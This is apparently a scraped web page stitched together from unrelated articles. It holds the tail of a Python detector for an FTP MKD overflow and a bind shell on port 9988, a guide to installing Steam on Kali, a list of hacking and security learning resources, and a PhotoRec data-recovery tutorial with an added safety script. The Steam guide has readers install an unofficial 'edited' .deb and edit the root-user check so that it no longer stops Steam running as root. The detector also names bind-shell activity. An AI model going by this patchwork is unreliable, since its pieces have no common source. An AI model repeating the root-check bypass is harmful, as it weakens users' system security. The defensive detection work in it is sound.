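        if len(fields) >= 4 and fields[0] == "TCP" and fields[3] == "LISTENING":
            ports.add(int(fields[1].rsplit(":", 1)[1]))
    return ports


def new_listeners(before, after):
    """Ports that appeared between two snapshots; a bind shell shows up here."""
    return sorted(listening_ports(after) - listening_ports(before))


if __name__ == "__main__":
    for idx, reasons in scan_ftp_log(SAMPLE_FTP_LOG).items():
        print("line %d: %s" % (idx, "; ".join(reasons)))
    print("new listening ports:", new_listeners(NETSTAT_BEFORE, NETSTAT_AFTER))
```

Only the oversized MKD line is flagged (for both its length and its non-printable bytes), and the snapshot diff reports port 9988 as the new listener, which is exactly the bind shell the nc session above connects to.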

Source: fuzzysecurity.com

Image Source: img.wonderhowto.com

Install Steam on Kali Sana

Well, I had a hell of a time installing Steam on Kali Linux. I got it up and going and figured I would make a guide on getting it up and running fast with a root account. None of this was really my work, but I had to use a few other people’s work, and I have noted where I found it, as they deserve the credit. Also note you will have to figure out how to install your own restricted drivers if you want your video card to run optimally, but I have faith in you to figure that out.

Step 1:

Install the jockey-common package (with the script below) before you start, as it is required and makes Steam run a little better. Credits are in the script.

#!/bin/bash
# inspired by kochd's script
# installs equivs, which is used to generate fake (dummy) packages
sudo apt-get install equivs

# writes the control file for the fake package to a file called 'tmp'
# (Debian control format: continuation lines of Description start with a
#  space, and a blank line inside the description is written as " .")
cat > tmp <<'EOF'
Package: jockey-common
Priority: optional
Section: admin
Installed-Size: 728
Maintainer: Martin Pitt <martin.pitt@ubuntu.com>
Architecture: all
Source: jockey
Version: 0.9.7-0ubuntu7
Depends: bash
Description: user interface and desktop integration for driver management
 Jockey provides a user interface for configuring third-party drivers,
 such as the Nvidia and ATI fglrx X.org and various Wireless LAN
 kernel modules.
 .
 This package contains the common data shared between the frontends.
Python-Version: 2.7
EOF

# builds the fake package from the control file
equivs-build tmp
# installs the fake package
sudo dpkg -i jockey-common_0.9.7-0ubuntu7_all.deb

# cleans up the control file and the package
rm tmp jockey-common_0.9.7-0ubuntu7_all.deb

 

Step 2:

Download the edited client:

In Terminal

dpkg --add-architecture i386

apt-get update

wget https://github.com/GhostSquad57/Steam-Installer-for-Wheezy/raw/master/steam-debian_1.0.0.43-2_all.deb
sudo dpkg -i steam-debian_1.0.0.43-2_all.deb

Step 3:

Run it as Root

Browse to /usr/bin/, find the steam file and open it in an editor. In the middle of the file, find this:

# Don't allow running as root
if [ "$(id -u)" == "0" ]; then
show_message --error $"Cannot run as root user"
exit 1
fi

and replace the 0 with a 1 like this

# Don't allow running as root
if [ "$(id -u)" == "1" ]; then
show_message --error $"Cannot run as root user"
exit 1
fi

Well if you liked this please comment …

Source: techienewsnetwork.com


80+ Best Free Hacking Tutorials | Resources to Become Pro Hacker


Learning to become a hacker is not as easy as learning to become a software developer. I realized this when I started looking for learning resources for the simple hacks people do. Even to start doing the simplest hack on your own, a hacker requires in-depth knowledge of multiple topics. Some people recommend that a minimum knowledge of a few programming languages like C, Python and HTML, together with Unix operating system concepts and networking knowledge, is required to start learning hacking techniques.

Though knowing a lot of things is required, it is not really enough for you to be a competent and successful hacker. You must have a passion and a positive attitude towards problem solving. Security software is constantly evolving, and therefore you must keep learning new things at a really fast pace.

If you are thinking about ethical hacking as a career option, you may need to be prepared for a lot of hard/smart work. I hope these free resources will help you speed up your learning. If you decide to pursue ethical hacking as a career option, you may also want to read some IN DEPTH ETHICAL HACKING BOOKS.

A lot of people (including me, before doing research for this article) think that they can become a hacker using some of the free hacking tools available on the web. It's true that some common types of hacking can easily be done with the help of tools; however, doing so does not really make you a hacker. A true hacker is one who can find a vulnerability and develop a tool to exploit and/or demonstrate it.

Hacking is not only about knowing "how things work", but about knowing "why things work that way" and "how we can challenge it".

Below are some really useful hacking tutorials and resources you may want to explore in your journey of learning to hack.

Hacking For Dummies – Beginners Tutorials

These tutorials are not really simple for anyone who is just starting to learn hacking techniques. However, they should be a simple starting point for you. I am sure you will have a different opinion about the complexity of each tutorial; however, advanced hackers are going to call this the job of a script kiddie (beginner hacker). Even to acquire the skills of a script kiddie you need a good understanding of computer fundamentals and programming.

  1. CYBRARY – For those looking to learn ethical hacking skills online, Cybrary provides the perfect platform to do so. Cybrary is a free online IT and cyber security training network that provides instruction in the form of self-paced, easy-to-follow videos. Featuring courses on topics such as Penetration Testing and Ethical Hacking, Advanced Penetration Testing, Post Exploitation Hacking and Computer and Hacking Forensics, Cybrary provides instruction from the beginner to the highly-advanced level of hacking. Additionally, Cybrary offers supplemental study material along with their courses free of charge. With their in-depth training videos and study guides, Cybrary ensures that users develop the best hacking skills.
  2. HACKING TUTORIALS FOR BEGINNERS – By BreakTheSecurity.com
  3. HOW TO LEARN ETHICAL HACKING – By Astalavista.com
  4. PENETRATION TESTING TUTORIAL – By Guru99.com
  5. BACKTRACK PENETRATION TESTING TUTORIAL
  6. INTRODUCTION TO PENETRATION TESTING
  7. INFORMATION GATHERING WITH NMAP
  8. SIMPLE HOW TO ARTICLES By Open Web Application Security
  9. THE SIX DUMBEST IDEAS IN COMPUTER SECURITY
  10. SECURE DESIGN PRINCIPLES
  11. 10 STEPS TO SECURE SOFTWARE

Cryptography Related Tutorials

Cryptography is a must-know topic for any aspiring security professional or ethical hacker. You must understand how encryption and decryption are done. You must understand why some of the old encryption techniques do not work in the modern computing world.

This is an important area, and a lot of software programmers and professionals do not understand it very well. Learning cryptography requires a good understanding of mathematics, which means you also need good fundamentals in discrete mathematics.

  1. INTRODUCTION TO PUBLIC KEY CRYPTOGRAPHY
  2. CRYPTO TUTORIAL
  3. INTRODUCTION TO CRYPTOGRAPHY
  4. AN OVERVIEW OF CRYPTOGRAPHY
  5. CRYPTOGRAPHY TUTORIALS – Herong’s Tutorial Examples
  6. THE CRYPTO TUTORIAL – Learn How to Keep Secret Secret
  7. INTRODUCTION TO CRYPTOLOGY, PART 1: BASIC CRYPTOLOGY CONCEPTS

Websites For Security Related Articles And News

These are some websites that you may find useful for finding hacking-related resources and articles. A lot of simple tricks and tips are available through these sites for experimenting and improving yourself on the way to becoming an advanced hacker.

In recent years, many people have aspired to learn how to hack. With growing interest in this area, a lot of different types of hacking practices are evolving. With the popularity of social networks, many people have become inclined towards vulnerabilities in various social networks like Facebook, Twitter, MySpace, etc.

Continuous learning about the latest security issues, news and vulnerability reports is really important for any hacker or security professional. Some of the sites that keep publishing informative articles and news are listed here.

  1. HTTP://WWW.ASTALAVISTA.COM/
  2. HTTP://PACKETSTORMSECURITY.COM/
  3. HTTP://WWW.BLACKHAT.COM/
  4. HTTP://WWW.METASPLOIT.COM/
  5. HTTP://SECTOOLS.ORG/
  6. HTTP://WWW.2600.COM/
  7. DEF CON – HACKING CONFERENCE
  8. HTTP://WWW.BREAKTHESECURITY.COM/
  9. HTTP://WWW.HACKING-TUTORIAL.COM/
  10. HTTP://WWW.EVILZONE.ORG/
  11. HTTP://HACKADAY.COM/
  12. HTTP://WWW.HITB.ORG/
  13. HTTP://WWW.HACKTHISSITE.ORG/
  14. HTTP://PENTESTMAG.COM
  15. HTTP://WWW.SECURITYTUBE.NET/
  16. HTTPS://WWW.SSLLABS.COM/

EBooks And Whitepapers

Some of the research papers by security experts and gurus can provide you with a lot of information and inspiration. White papers can be really difficult to read and understand, so you may need to read them multiple times. Once you understand the topic well, reading will become much faster and you will be able to skim through a lot of content in less time.

  1. HANDBOOK OF APPLIED CRYPTOGRAPHY – This ebook contains some free chapters from one of the popular cryptography books. The full book is also available on Amazon at CRYPTOGRAPHY BOOK.
  2. NETWORK PENETRATION TESTING GUIDE
  3. HOW TO HACK ANYTHING IN JAVA
  4. MCAFEE ON IPHONE AND IPAD SECURITY
  5. A GOOD COLLECTION OF WHITE PAPERS ON SECURITY AND VULNERABILITIES – This site contains a collection of white papers from different sources, and some of these white papers are really worth referring to.
  6. ENGINEERING PRINCIPLES FOR INFORMATION TECHNOLOGY SECURITY
  7. BASIC PRINCIPLES OF INFORMATION PROTECTION
  8. OPEN WEB APPLICATION SECURITY PROJECT – OWASP is one of the most popular sites containing web application security related information.

Videos & Play Lists

For those who like to watch video tutorials, here are a few I liked. However, there are many small videos available on YouTube. Feel free to explore more and share with us if you like something.

  1. CRYPTOGRAPHY COURSE – By Dan Boneh, Stanford University
  2. OPEN SECURITY TRAINING – YouTube playlist of more than 90 hours. I have found this to be the biggest free training available on security-related topics.
  3. OWASP APPSEC USA 2011: YouTube playlist containing a compilation of OWASP conference highlights from 2011.
  4. DEFCON: HOW I MET YOUR GIRLFRIEND – DEF CON is one of the most popular hacker conferences. The presenters at this conference are well known in the hacking industry.
  5. DEFCON: WHAT HAPPENS WHEN YOU STEAL A HACKERS COMPUTER
  6. DEFCON: NMAP: SCANNING THE INTERNET
  7. PUBLIC KEY CRYPTOGRAPHY: Diffie-Hellman Key Exchange
  8. WEB APPLICATION PEN TESTING
  9. INTRO TO SCANNING NMAP, HPING, AMAP, TCPDUMP, METASPLOIT

Forums For Hackers And Security Professionals

Just like in any other area, forums are a really great help for learning from other experts. Hundreds of security experts and ethical/non-ethical hackers are willing to share their knowledge on forums for some reason. Please keep in mind to do enough research before posting a question, and be polite to the people who take time to answer your question.

  1. STACKOVERFLOW FOR SECURITY PROFESSIONALS
  2. HTTP://DARKSAT.X47.NET/
  3. HTTP://FORUMS.SECURITYINFOWATCH.COM/
  4. HTTP://FORUMS.CNET.COM/SPYWARE-VIRUSES-SECURITY-FORUM/
  5. HTTP://WWW.HACKFORUMS.NET/FORUMDISPLAY.PHP?FID=47

Vulnerability Databases And Resources

Vulnerability databases are the first place to start your day as a security professional. Any newly detected vulnerability is generally made available through the public vulnerability databases. These databases are a big source of information for hackers to be able to understand and exploit/avoid/fix the vulnerability.

  1. HTTP://WWW.EXPLOIT-DB.COM/
  2. HTTP://1337DAY.COM/
  3. HTTP://SECURITYVULNS.COM/
  4. HTTP://WWW.SECURITYFOCUS.COM/
  5. HTTP://WWW.OSVDB.ORG/
  6. HTTP://WWW.SECURITEAM.COM/
  7. HTTP://SECUNIA.COM/ADVISORIES/
  8. HTTP://INSECURE.ORG/SPLOITS_ALL.HTML
  9. HTTP://ZERODAYINITIATIVE.COM/ADVISORIES/PUBLISHED/
  10. HTTP://NMRC.ORG/PUB/INDEX.HTML
  11. HTTP://WEB.NVD.NIST.GOV
  12. HTTP://WWW.VUPEN.COM/ENGLISH/SECURITY-ADVISORIES/
  13. HTTP://WWW.VUPEN.COM/BLOG/
  14. HTTP://CVEDETAILS.COM/
  15. HTTP://WWW.RAPID7.COM/VULNDB/INDEX.JSP
  16. HTTP://OVAL.MITRE.ORG/

Product Specific Vulnerability Information

Some of the very popular products in the world require special attention, and therefore you may want to look at the specific security websites directly from the vendors. I have kept Linux, Microsoft and Apache in this list; however, it may apply to any product you use heavily.

  1. RED HAT SECURITY AND OTHER UPDATES SITE
  2. MICROSOFT PRODUCTS SECURITY BULLETIN
  3. APACHE FOUNDATION PRODUCTS SECURITY REPOSITORY
  4. UBUNTU SOFTWARE SECURITY CENTER
  5. LINUX SECURITY REPOSITORY

Tools And Programs For Hacking / Security

There are dozens of tools available for doing different types of hacking and testing. Tools are really important for becoming more productive at your work. Some of the very common tools used by hackers are listed here. You may have a different choice of tools based on your own comfort.

  1. NMAP
  2. NSS
  3. HPING
  4. TCPDUMP
  5. METASPLOIT
  6. WIRESHARK
  7. NETWORK STUFF
  8. NIKTO

Summary

I have tried to compile some of these resources for my own reference on the journey of learning I am going to start. I am not even at a beginner level of becoming a hacker, but the knowledge of this field really fascinates me and keeps me motivated to learn more and more. I hope I will be able to become successful in this.

A lot of people use their knowledge and skills for breaking stuff and stealing. I personally think that doing harm to someone is a weak choice and will not have a good ending. I would recommend not using your skills for any unethical endeavor. A single misuse of your skill may jeopardize your career, since most companies do a strict third-party background check before they hire an ethical hacker or security personnel.

There are dozens of companies looking for ethical hackers and security professionals. There are a really good number of opportunities in this area, and it is a really niche compensation segment. You will easily be able to get a decent job without even acquiring all the expert-level skills of a pro hacker.

Source: fromdev.com

How to Recover Data from a Corrupt / Formatted USB Flash Drive via PhotoRec in Linux/Ubuntu

Hi all, today we'll be helping you recover data from a formatted or virus-corrupted USB flash drive (pen drive), hard disk, memory stick, etc. in Linux. In this tutorial we'll be using PhotoRec, a program that ships in the TestDisk package.

TestDisk is free and open source software which was primarily designed to help recover lost partitions and/or make non-booting disks bootable again when these symptoms are caused by faulty software, certain types of viruses or human error (such as accidentally deleting a partition table).

If you accidentally deleted your data, formatted your USB flash drive, or a friend's virus-ridden Windows machine corrupted it, then PhotoRec is an awesome tool to choose for data recovery.

TestDisk can:

  • Fix partition table, recover deleted partition
  • Recover FAT32 boot sector from its backup
  • Rebuild FAT12/FAT16/FAT32 boot sector
  • Fix FAT tables
  • Rebuild NTFS boot sector
  • Recover NTFS boot sector from its backup
  • Fix MFT using MFT mirror
  • Locate ext2/ext3/ext4 Backup SuperBlock
  • Undelete files from FAT, exFAT, NTFS and ext2 filesystems
  • Copy files from deleted FAT, exFAT, NTFS and ext2/ext3/ext4 partitions.

Here are the steps you'll need to follow to use PhotoRec to recover data from the memory device:

1. Installing PhotoRec

First we'll need to update our repository index using the command below. I am running Ubuntu 14.04 LTS (Trusty), so I will go for sudo apt-get update; the command differs by distro:

sudo apt-get update

Then we'll install testdisk, which includes PhotoRec:

sudo apt-get install testdisk

Note: PhotoRec is included in testdisk, so you don't need to install photorec separately.

2. Recovering Data

OK, now we'll get to the real and important stuff, i.e. recovering our deleted data or formatted USB stick. For that we'll run photorec. PhotoRec lets you recover every type of data from the device.

sudo photorec

The above command will show you the list of the storage devices detected by your computer, as shown in the figure below:

Then we'll select the partition that holds the data we want to recover. If we know the format of the data we need to recover, select the File Opt option in the menu. You can do that by pressing the right arrow key.

You can select the format by pressing the spacebar, and then press b to save the changes.

Then the previous menu will come back; select Search to search for the lost data.

Then we'll select the location where the recovered files will be saved. Note: do not select a directory on the memory device itself as the destination, since writing to it would overwrite the very data you are trying to recover.

Select .. to go back, Enter to get into a directory, and press C when you are done to choose that directory as the destination.

After you select the directory, the program will start recovering the data. After it is done, you'll be able to browse your files in the destination you selected.

Yes, now we are done. We have successfully recovered the required data from our memory stick using PhotoRec. You can visit the PhotoRec website if you need more information, or comment below.
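The steps above are interactive, and the one that silently ruins a recovery is picking a destination on the same disk PhotoRec is carving from. The script below is an added example, not code from the original post or from the TestDisk project: it wraps the same workflow in a few shell functions that (a) refuse a destination living on the source disk or any of its partitions, (b) image the device first with dd so PhotoRec carves from a read-only copy instead of the live flash drive, and (c) record a SHA-256 of that image. The device names and paths are placeholders; PhotoRec's `/d` option (recovery directory) is the only PhotoRec flag used.

```shell
#!/bin/sh
# Added example (not from the original post): guard rails around the PhotoRec
# workflow described above. Device and path names are placeholders.

# fs_of DIR: print the filesystem source (e.g. /dev/sdb1, overlay) DIR is mounted from.
fs_of() {
    df -P "$1" 2>/dev/null | awk 'NR == 2 { print $1 }'
}

# disk_of DEV: strip a partition suffix so the whole disk can be compared:
#   /dev/sdb1 -> /dev/sdb, /dev/nvme0n1p2 -> /dev/nvme0n1, /dev/loop0 -> /dev/loop
# A whole-disk name such as /dev/sdb is returned unchanged.
disk_of() {
    printf '%s\n' "$1" | sed -E 's/([0-9])p[0-9]+$/\1/; t; s/[0-9]+$//'
}

# dest_is_safe DEST SRC_DEV: exit 0 only if DEST is NOT on SRC_DEV or on another
# partition of the same disk; 1 if it is; 2 if the answer cannot be determined
# (missing directory, empty device). Unknown is treated as unsafe by the caller.
dest_is_safe() {
    [ -n "$2" ] || return 2
    dest_fs=$(fs_of "$1")
    [ -n "$dest_fs" ] || return 2
    src_disk=$(disk_of "$2")
    case "$dest_fs" in
        "$src_disk"*) return 1 ;;   # same disk: recovered files would overwrite source sectors
    esac
    return 0
}

# run_recovery SRC_DEV DEST: image the device, hash the image, then let PhotoRec
# carve from the image rather than from the live (possibly failing) device.
# Must be run as root (dd reads the raw device). Example:
#   sudo sh recover.sh --run /dev/sdX /mnt/other-disk/recovery
run_recovery() {
    src=$1
    dest=$2
    mkdir -p "$dest" || return 1
    dest_is_safe "$dest" "$src" || {
        echo "refusing: $dest is on the same disk as $src (or could not be checked)" >&2
        return 1
    }
    image="$dest/source.img"
    # noerror,sync keeps going past unreadable sectors and zero-fills them,
    # which is what you want from a flash drive that is starting to fail.
    dd if="$src" of="$image" bs=4M conv=noerror,sync || return 1
    # A hash lets you show later that the image was not modified during carving.
    sha256sum "$image" > "$image.sha256"
    # /d sets PhotoRec's recovery directory; it creates recup_dir.N under it.
    photorec /d "$dest/recovered" "$image"
}

# Only run when explicitly asked, so sourcing this file just defines the functions.
case "${1-}" in
    --run) run_recovery "$2" "$3" ;;
esac
```

Running `dest_is_safe` before anything touches the drive is the whole point: an unknown answer (exit 2) is treated as unsafe, so a typo in the destination path cannot fall through to the dd step.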

Source: http://linoxide.com/